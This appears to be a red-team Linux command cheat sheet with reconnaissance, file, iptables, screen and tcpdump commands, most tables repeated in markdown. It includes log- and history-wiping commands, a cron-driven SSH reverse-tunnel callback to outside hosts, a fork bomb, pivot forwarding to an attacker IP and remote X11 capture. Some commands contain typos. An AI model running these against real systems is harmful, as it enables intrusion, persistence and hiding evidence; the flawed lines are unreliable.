Red Team Linux

Network Commands


  watch ss -tp Network connections
  netstat -ant TCP connections -anu-udp
  netstat -tulpn Connections with PIDs
  lsof -i Established connections
  smb://<ip>/share Access Windows SMB share
  share user x.x.x.x C$ Mount Windows share
  smbclient -U user \\\\<ip>\\<share> SMB connect
  ifconfig eht# <ip>/<cidr> Set IP and netmask
  ifconfig eth0:1 <ip>/<cidr> Set Virtual interface
  route add default gw <gw_ip> Set Gateway
  ifconfig eth# mtu [size] Change MTU size
  export MAC=x.x.x.x.x.x Change MAC
  ifconfig <int> hw ether <MAC> Change MAC
  macchanger -m <MAC> <int> BackTrack MAC Changer
  iwlist <int> scan Built-in WiFi scanner
  dig -x <ip> Domain lookup for IP
  host <ip> Domain lookup for IP
  dig @<ip> domain -t AXFR DNS Zone transfer
  host -l <domain> <nameserver> DNS Zone transfer
  ip xfrm state list Print existing VPN keys
  ip addr add <ip>/<cidr> dev eth0 Adds hidden interface
  /var/log/messages | grep DHCP List DHCP assignments
  tcpkill host <ip> and port <port> Block ip:port
  echo "1" > /proc/sys/net/ipv4/ip_forward Turn on IP forwarding
  echo "nameserver x.x.x.x" > /etc/resolv.conf Add DNS server

Top - Home

System Info


  nbtstat -A <ip> Get hostname for ip
  id Current username
  w Logged on users
  who -a User information
  last -a Last users logged on
  ps -ef Process listing, top
  df -h Disk usage
  uname -a Kernel version / CPU info
  mount Mounted file system
  getent passwd Show list of users
  PATH=$PATH:/home/mypath Add to PATH variable
  kill <pid> Kills process with pid
  cat /etc/issue Show OS info
  cat /etc/*release* Show OS version info
  cat /proc/version Show kernel info
  rpm --query -all Installed packages, Redhat
  rpm -ivh *.rpm Install RPM -e=remove
  dpkg -get-selections Installed packages, Ubuntu
  dpkg -I *.deb Install DEB -r=remove
  pkginfo Installed packages, Solaris
  which <tscsh/csh/ksh/bash> Show location of executable
  chmod 750 <tsch/csh/ksh> Disable shell, force bash

Top - Home

Utility Commands

  
  wget http://<url> -O url.txt -o /dev/null Grab URL
  rdesktop <ip> Remote Desktop to IP
  scp /tmp/file user@x.x.x.x:/tmp/file Put file
  scp user@<remoteip>:/tmp/file /tmp/file Get file
  useradd -m <user> Add user
  passwd <user> Change user password
  rmuser uname Remove user
  script -a <outfile> Record shell : Ctrl-D stops
  apropos <subject> Find related command
  history View users command history
  !<num> Executes line # in history

Top - Home

File Commands

  
  diff file1 file2 Compare files
  rm -rf <dir> Force delete of DIR
  shred -f -u <file> Overwrite / delete file
  touch -r <ref_file> <file> Matches ref_file timestamp
  touch -t YYYYMMDDHHSS <file> Set file timestamp
  sudo fdisk -l List connected drives
  mount /dev/sda# /mnt/usbkey Mount USB key
  md5sum -t file Compare MD5 hash
  echo -n "str" | md5sum Generate MD5 hash
  sha1sum file SHA1 hash of file
  sort -u Sort/show unique lines
  grep -c "str" file Count lines with str
  tar cf file.tar files Create .tar from files
  tar xf file.tar Extract .tar
  tar czf file.tar.gz files Create .tar.gz
  tar xzf file.tar.gz Extract .tar.gz
  tar cjf file.tar.bz2 files Create .tar.bz2
  tar xjf file.tar.bz2 Extract .tar.bz2
  gzip file Compress/rename file
  gzip -d file.gz Decompress file.gz
  upx -9 -o out.exe orig.exe UPX packs orig.exe
  zip -r <ziname.zip> \Directory\* Create zip
  dd skip=1000 count=2000 bs=8 if=file of=file Cut block 1k-3k from file
  awk 'sub("s"."\r")' unix.txt > win.txt Win compatible txt file
  split -b 9K \<file> <prefix> Split file into 9K chunks
  find -i -name <file> -type *.pdf Find PDF files
  find / -perm -4000 -o -perm -2000 -exec ls -ldb {} \; Search for Setuid files
  dos2unix <file> Convert to *nix format
  file <file> Determine file type/info
  chattr (+/-)i <file> Set/Unset immutable bit

Top - Home

Cover Your Tracks


  echo "" > /var/log/auth.log Clear auth.log file
  echo "" > ~/.bash_history Clear current user bash history
  rm ~/.bash_history -rf Delete bash history file
  history -c Clear current session history
  export HISTFILESIZE=0 Set history max lines to 0
  export HISTSIZE=0 Set history max commands to 0
  unset HISTFILE Disable history logging, must logout to take effect
  kill -9 $$ Kills current session
  ln /dev/null ~/.bash_history -sf Permanently send all bash history command to /dev/null

Top - Home

File System Structure

  
  /bin User binaries
  /boot Boot up related files
  /dev Interface for system devices
  /etc System configuration files
  /home Base directory of user files
  /lib Critical software libraries
  /opt Third part software
  /proc System and running programs
  /root Home directory of root user
  /sbin System administration binaries
  /tmp Temporary files
  /usr Less critical files
  /var Variable system files

Top - Home

Linux Files

  
  /etc/shadow Local user hashes
  /etc/passwd Local users
  /etc/group Local groups
  /etc/rc.d Startup services
  /etc/init.d Service
  /etc/hosts Known hostnames and IPs
  /etc/HOSTNAME Full hostname with domain
  /etc/network/interfaces Network configuration
  /etc/profile System environment variables
  /etc/apt/sources.list Ubuntu sources list
  /etc/resolv.conf Nameserver configuration
  /home/<user>/.bash_history Bash history (also /root/)
  /usr/share/wireshark/manuf Vendor-MAC lookup
  ~/.ssh/ SSH keystore
  /var/log System log files (most Linux)
  /var/adm System log files (Unix)
  /var/spool/cron List cron files
  /var/log/apache/access.log Apache connection log
  /etc/fstab Static file system info

Top - Home

Scripting

Ping Sweep

for x in {1..254..1};do ping -c 1.1.1.$x |grep "64 b" |cut -d" " -f4 >> ips.txt; done

Automated Domain Name Resolve Bash Script

#!/bin/bash
echo "Enter Class C Range: ie 192.168.3"
read range
for ip in {1..254..1};do
host $range.$ip |grep "name pointer" |cut -d" " -f5
done

Fork Bomb (create processes until sytem crash)

:(){:|:&};:

DNS Reverse Lookup

for ip in {1..254..1}; do dig -x 1.1.1.$ip |grep $ip >> dns.txt; done;

IP Banning Script

#!/bin/sh
# This script bans any IP in the /24 subnet
# It assumes 1 is the router and does not ban .20 .21 .22
i=2
while [ $i -le 253]
do
  if [ $i -ne 20 -a $i -ne 21 -a $i -ne 22 ]; then
    echo "BANNED: arp -s 192.168.1.$i"
    arp -s 192.168.1.$i 00:00:00:00:00:0a
  else
    echo "IP NOT BANNED: 192.168.1.$i***********"
    echo "**************************************"
  fi
  i='expr $i +1'
done

SSH Callback

Setup script in crontab to callback every X minutes. Highly recommend you setup a generic user (if no shell privs). Script will use a private key located on callback source computer to connect to public key. Red teamer connects to target via local SSH session. (ssh -p4040 localhost)

#!/bin/sh
# Callback script located on target computer
killall ssh >/dev/null 2>&1
sleep 5
REMLIS=4040
REMUSR=user
HOSTS="domain1.com domain2.com domain3.com"
for LIVEHOST in $HOSTS;
do
  COUNT=$(ping -c2 $LIVEHOST | grep 'received' | awk -F',' '{ print $2 }' | awk '{ print $1 }')
  if [[ $COUNT -gt 0 ]]; then
    ssh -R ${REMLIS}:localhost:22 -i "/home/${REMUSR}/.ssh/id_rsa" -N ${LIVEHOST} -l ${REMUSR}
fi

Top - Home

IP Tables


  iptables-save -c > <file> Dump iptables rules to stdout
  iptables-restore <file> Restore iptables rules
  iptables -L -v --line-numbers List all iptables rules with affected and line numbers
  iptables -F Flush all iptables rules
  iptables -P <INPUT/FORWARD/OUTPUT> <ACCEPT/REJECT/DROP> Change default policy for rules that don't match rules
  iptables -A INPUT -i <interface> -m state --state RELATED,ESTABLISHED -j ACCEPT Allow established connections on INPUT
  iptables -D INPUT 7 Delete 7th inbound rule
  iptables -t raw -L -n Increase throughput by turning off statefullness
  iptables -P INPUT DROP Drop all packets

Allow SSH on port 22 Outbound

> iptables -A OUTPUT -o <iface> -p tcp --dport 22 -m state --state NEW,ESTABLISHED -j ACCEPT
> iptables -A INPUT -i <iface> -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT

Allow ICMP Outbound

> iptables -A OUTPUT -i <iface> -p icmp --icmp-type echo-request -j ACCEPT
> iptables -A INPUT -o <iface> -p icmp --icmp-type echo-reply -j ACCEPT

Port Foward

> echo "1" > /proc/sys/net/ipv4/ip_forward
# OR -> sysctl1 net.ipv4.ip_forward=1
> iptables -t nat -A PREROUTING -p tcp -i eth0 -j DNAT -d <pivotip> --dport 443 -to-destination <attk_ip>:443
> iptables -t nat -A POSTROUTING -p tcp -i etho0 -j SNAT -s <target subnet cidr> -d <attackip> --dport 443 -to-source <pivotip>
> iptables -t filter -I FORWARD l -j ACCEPT

Allow only 1.1.1.0/24, ports 80, 443 and log drops to /var/log/messages

> iptables -A INPUT -s 1.1.1.0/24 -m state --state RELATED,ESTABLISHED,NEW -p tcp -m multiport --dports 80,443 -j ACCEPT
> iptables -A INPUT -i eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT
> iptables -P INPUT DROP
> iptabels -A OUTPUT -o eth0 -j ACCEPT
> iptables -A INPUT -i lo -j ACCEPT
> iptables -A OUTPUT -o lo -j ACCEPT
> iptables -N LOGGING
> iptables -A INPUT -j LOGGING
> iptables -A LOGGING -m lmiit --limit 4/min -j LOG --log-prefix "DROPPED "
> iptables -A LOGGING -j DROP

Top - Home

UPDATE-RC.D

  
  service --status-all + service starts at boot, - service does not
  service <service> start Start a service
  service <service> stop Stop a service
  service <service> status Check status
  update-rc.d -f <service> remove Remove the service startup comamnd, -f if the /etc/init.d startup file exists
  update-rc.d <service> defaults Add a start up service

Top - Home

CHKCONFIG

* Available in Linux distributions such as RedHat Enterprise, CentOS and Oracle Enterprise Linux.

  
  chkconfig --list List existing services and run status
  chkconfig <service> -list Check single service status
  chkconfig <service> on [--level 3] Add service, optional to add level at which service runs
  chkconfig <service> off [--level 3] Remove service

Top - Home

Screen

  
  screen -S <name> Start new screen with name
  screen -ls List running screens
  screen -r <name> Attach to screen name
  screen -S <name> -X <cmd> Send command to screen name
  C-a ? List keybindings
  C-a d Detach
  C-a D D Detach and logout
  C-a c Create new window
  C-a C-a Switch to last active window
  C-a ` <num|name> Switch to window num or name
  C-a " See window list and change
  C-a k Kill current window
  C-a S Split display horizontally
  C-a V Split display vertically
  C-a tab Jump to next display
  C-a X Remove current region
  C-a Q Remove all regions but current

Top - Home

X11

Capture Remote X11 windows and convert to JPG

xwd -display <ip>:0 -root -out /tmp/test.xpm
xwud -in /tmp/test1.xpm
convert /tmp/test.xpm -resize 1280x0124 /tmp/test.jpg

Open X11 stream viewing

xwd -display 1.1.1.1:0 -root -silent -out x11dump
Read dumped file with xwudtopnm or GIMP

Top - Home

TCP Dump

Capture packets on eth0 in ASCII and hex and write to file

> tcpdump -i eth0 -XX -w out.pcap

Capture HTTP traffic to 2.2.2.2

> tcpdump -i eth0 port 80 dat 2.2.2.2

Show connections to a specific IP

> tcpdump -i eth0 -tttt dst 192.168.1.22 and not net 192.168.1.0/24

Print all ping responses

> tcpdump -i eth0 'icmp[icmptype] == icmp-echoreply'

Capture 50 DNS packets and print timestamps

> tcpdump -i eth0 -c 50 -tttt `udp and port 53'

Top - Home

Native Kali Commands

WMIC Equivalent

> wmis -U DOMAIN\<user>%<password> //<DC> cmd.exe /c <command>

Mount SMB Share

# Mounts to /mnt/share. For other options, man mount.cifs
> mount.cifs //<ip>/share /mnt/share -o user=<user>,pass=<pass>,sec=ntlmssp,domain=<domain>,rw

Updating Kai

> apt-get update
> apt-get upgrade

Top - Home

`watch ss -tp`	Network connections
`netstat -ant`	TCP connections -anu-udp
`netstat -tulpn`	Connections with PIDs
`lsof -i`	Established connections
`smb://<ip>/share`	Access Windows SMB share
`share user x.x.x.x C$`	Mount Windows share
`smbclient -U user \\\\<ip>\\<share>`	SMB connect
`ifconfig eht# <ip>/<cidr>`	Set IP and netmask
`ifconfig eth0:1 <ip>/<cidr>`	Set Virtual interface
`route add default gw <gw_ip>`	Set Gateway
`ifconfig eth# mtu [size]`	Change MTU size
`export MAC=x.x.x.x.x.x`	Change MAC
`ifconfig <int> hw ether <MAC>`	Change MAC
`macchanger -m <MAC> <int>`	BackTrack MAC Changer
`iwlist <int> scan`	Built-in WiFi scanner
`dig -x <ip>`	Domain lookup for IP
`host <ip>`	Domain lookup for IP
`dig @<ip> domain -t AXFR`	DNS Zone transfer
`host -l <domain> <nameserver>`	DNS Zone transfer
`ip xfrm state list`	Print existing VPN keys
`ip addr add <ip>/<cidr> dev eth0`	Adds hidden interface
`/var/log/messages \| grep DHCP`	List DHCP assignments
`tcpkill host <ip> and port <port>`	Block ip:port
`echo "1" > /proc/sys/net/ipv4/ip_forward`	Turn on IP forwarding
`echo "nameserver x.x.x.x" > /etc/resolv.conf`	Add DNS server

`nbtstat -A <ip>`	Get hostname for ip
`id`	Current username
`w`	Logged on users
`who -a`	User information
`last -a`	Last users logged on
`ps -ef`	Process listing, top
`df -h`	Disk usage
`uname -a`	Kernel version / CPU info
`mount`	Mounted file system
`getent passwd`	Show list of users
`PATH=$PATH:/home/mypath`	Add to PATH variable
`kill <pid>`	Kills process with pid
`cat /etc/issue`	Show OS info
`cat /etc/release`	Show OS version info
`cat /proc/version`	Show kernel info
`rpm --query -all`	Installed packages, Redhat
`rpm -ivh *.rpm`	Install RPM -e=remove
`dpkg -get-selections`	Installed packages, Ubuntu
`dpkg -I *.deb`	Install DEB -r=remove
`pkginfo`	Installed packages, Solaris
`which <tscsh/csh/ksh/bash>`	Show location of executable
`chmod 750 <tsch/csh/ksh>`	Disable shell, force bash

`wget http://<url> -O url.txt -o /dev/null`	Grab URL
`rdesktop <ip>`	Remote Desktop to IP
`scp /tmp/file user@x.x.x.x:/tmp/file`	Put file
`scp user@<remoteip>:/tmp/file /tmp/file`	Get file
`useradd -m <user>`	Add user
`passwd <user>`	Change user password
`rmuser uname`	Remove user
`script -a <outfile>`	Record shell : Ctrl-D stops
`apropos <subject>`	Find related command
`history`	View users command history
`!<num>`	Executes line # in history

`diff file1 file2`	Compare files
`rm -rf <dir>`	Force delete of DIR
`shred -f -u <file>`	Overwrite / delete file
`touch -r <ref_file> <file>`	Matches ref_file timestamp
`touch -t YYYYMMDDHHSS <file>`	Set file timestamp
`sudo fdisk -l`	List connected drives
`mount /dev/sda# /mnt/usbkey`	Mount USB key
`md5sum -t file`	Compare MD5 hash
`echo -n "str" \| md5sum`	Generate MD5 hash
`sha1sum file`	SHA1 hash of file
`sort -u`	Sort/show unique lines
`grep -c "str" file`	Count lines with str
`tar cf file.tar files`	Create .tar from files
`tar xf file.tar`	Extract .tar
`tar czf file.tar.gz files`	Create .tar.gz
`tar xzf file.tar.gz`	Extract .tar.gz
`tar cjf file.tar.bz2 files`	Create .tar.bz2
`tar xjf file.tar.bz2`	Extract .tar.bz2
`gzip file`	Compress/rename file
`gzip -d file.gz`	Decompress file.gz
`upx -9 -o out.exe orig.exe`	UPX packs orig.exe
`zip -r <ziname.zip> \Directory\*`	Create zip
`dd skip=1000 count=2000 bs=8 if=file of=file`	Cut block 1k-3k from file
`awk 'sub("s"."\r")' unix.txt > win.txt`	Win compatible txt file
`split -b 9K \<file> <prefix>`	Split file into 9K chunks
`find -i -name <file> -type *.pdf`	Find PDF files
`find / -perm -4000 -o -perm -2000 -exec ls -ldb {} \;`	Search for Setuid files
`dos2unix <file>`	Convert to *nix format
`file <file>`	Determine file type/info
`chattr (+/-)i <file>`	Set/Unset immutable bit

`echo "" > /var/log/auth.log`	Clear auth.log file
`echo "" > ~/.bash_history`	Clear current user bash history
`rm ~/.bash_history -rf`	Delete bash history file
`history -c`	Clear current session history
`export HISTFILESIZE=0`	Set history max lines to 0
`export HISTSIZE=0`	Set history max commands to 0
`unset HISTFILE`	Disable history logging, must logout to take effect
`kill -9 $$`	Kills current session
`ln /dev/null ~/.bash_history -sf`	Permanently send all bash history command to /dev/null

`/bin`	User binaries
`/boot`	Boot up related files
`/dev`	Interface for system devices
`/etc`	System configuration files
`/home`	Base directory of user files
`/lib`	Critical software libraries
`/opt`	Third part software
`/proc`	System and running programs
`/root`	Home directory of root user
`/sbin`	System administration binaries
`/tmp`	Temporary files
`/usr`	Less critical files
`/var`	Variable system files

`/etc/shadow`	Local user hashes
`/etc/passwd`	Local users
`/etc/group`	Local groups
`/etc/rc.d`	Startup services
`/etc/init.d`	Service
`/etc/hosts`	Known hostnames and IPs
`/etc/HOSTNAME`	Full hostname with domain
`/etc/network/interfaces`	Network configuration
`/etc/profile`	System environment variables
`/etc/apt/sources.list`	Ubuntu sources list
`/etc/resolv.conf`	Nameserver configuration
`/home/<user>/.bash_history`	Bash history (also /root/)
`/usr/share/wireshark/manuf`	Vendor-MAC lookup
`~/.ssh/`	SSH keystore
`/var/log`	System log files (most Linux)
`/var/adm`	System log files (Unix)
`/var/spool/cron`	List cron files
`/var/log/apache/access.log`	Apache connection log
`/etc/fstab`	Static file system info

`iptables-save -c > <file>`	Dump iptables rules to stdout
`iptables-restore <file>`	Restore iptables rules
`iptables -L -v --line-numbers`	List all iptables rules with affected and line numbers
`iptables -F`	Flush all iptables rules
`iptables -P <INPUT/FORWARD/OUTPUT> <ACCEPT/REJECT/DROP>`	Change default policy for rules that don't match rules
`iptables -A INPUT -i <interface> -m state --state RELATED,ESTABLISHED -j ACCEPT`	Allow established connections on INPUT
`iptables -D INPUT 7`	Delete 7th inbound rule
`iptables -t raw -L -n`	Increase throughput by turning off statefullness
`iptables -P INPUT DROP`	Drop all packets

`service --status-all`	+ service starts at boot, - service does not
`service <service> start`	Start a service
`service <service> stop`	Stop a service
`service <service> status`	Check status
`update-rc.d -f <service> remove`	Remove the service startup comamnd, -f if the /etc/init.d startup file exists
`update-rc.d <service> defaults`	Add a start up service

`chkconfig --list`	List existing services and run status
`chkconfig <service> -list`	Check single service status
`chkconfig <service> on [--level 3]`	Add service, optional to add level at which service runs
`chkconfig <service> off [--level 3]`	Remove service

`screen -S <name>`	Start new screen with name
`screen -ls`	List running screens
`screen -r <name>`	Attach to screen name
`screen -S <name> -X <cmd>`	Send command to screen name
`C-a ?`	List keybindings
`C-a d`	Detach
`C-a D D`	Detach and logout
`C-a c`	Create new window
`C-a C-a`	Switch to last active window
C-a ` <num\|name>	Switch to window num or name
`C-a "`	See window list and change
`C-a k`	Kill current window
`C-a S`	Split display horizontally
`C-a V`	Split display vertically
`C-a tab`	Jump to next display
`C-a X`	Remove current region
`C-a Q`	Remove all regions but current